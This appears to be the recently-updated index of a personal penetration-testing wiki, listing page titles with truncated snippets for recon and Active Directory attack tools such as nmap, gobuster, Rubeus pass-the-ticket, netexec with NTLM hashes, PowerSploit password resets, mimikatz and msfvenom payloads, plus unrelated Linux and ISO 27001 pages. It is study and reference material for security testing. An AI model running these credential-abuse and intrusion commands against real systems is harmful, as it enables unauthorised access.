Skip to main content

Recently Updated Pages

2. Initial Access

Hacking Advanced Methodology

Updated 18 hours ago by Vlad Birgauanu

1. Enumeration

Hacking Advanced Methodology

Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV ...

Updated 18 hours ago by Vlad Birgauanu

Quick Checklist

Hacking Cheatsheets

Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/d...

Updated 18 hours ago by Vlad Birgauanu

ligolo-ng

Hacking Tools

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Appl...

Updated 18 hours ago by Vlad Birgauanu

mimikatz

Hacking Tools

You will need to first upload the binaries to the target, either via a meterpreter shell or power...

Updated 18 hours ago by Vlad Birgauanu

powersploit

Hacking Tools

Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forc...

Updated 18 hours ago by Vlad Birgauanu

rubeus

Hacking Tools

Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt

Updated 1 day ago by Vlad Birgauanu

msf

Hacking Tools

Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl h...

Updated 1 day ago by Vlad Birgauanu

powerview

Hacking Tools

1. Enumerate common names Get-DomainComputer | select cn

Updated 1 day ago by Vlad Birgauanu

netexec

Hacking Tools

Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP ...

Updated 1 day ago by Vlad Birgauanu

gobuster

Hacking Tools

Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web...

Updated 1 day ago by Vlad Birgauanu

nikto

Hacking Tools

Basic usage nikto -host http://TARGET_IP -p PORT

Updated 1 day ago by Vlad Birgauanu

fuff

Hacking Tools

Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET...

Updated 1 day ago by Vlad Birgauanu

wpscan

Hacking Tools

Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p ...

Updated 1 day ago by Vlad Birgauanu

nmap

Hacking Tools

Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 targe...

Updated 1 day ago by Vlad Birgauanu

autorecon

Hacking Tools

Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the belo...

Updated 1 day ago by Vlad Birgauanu

Fresh builds

Hacking

pimp-my-kali I use this to install all tools like impacket and so on .zshrc modifications I’ve...

Updated 1 day ago by Vlad Birgauanu

Komodo

Linux

https://komo.do - For in-depth information utilise the following Introduction Komodo is a lig...

Updated 1 day ago by Vlad Birgauanu

Key Differences between ISO 27001:2022 and 27001:2013

General

Annex A Control Type ISO/IEC 27001:2022 Annex A Identifier ISO/IEC 27001:2013 Annex A I...

Updated 1 day ago by Vlad Birgauanu

Basic Commands

Linux Linux for Beginners

cd Usage To change directories Examples cd temp # browses to the directory called t...

Updated 1 day ago by Vlad Birgauanu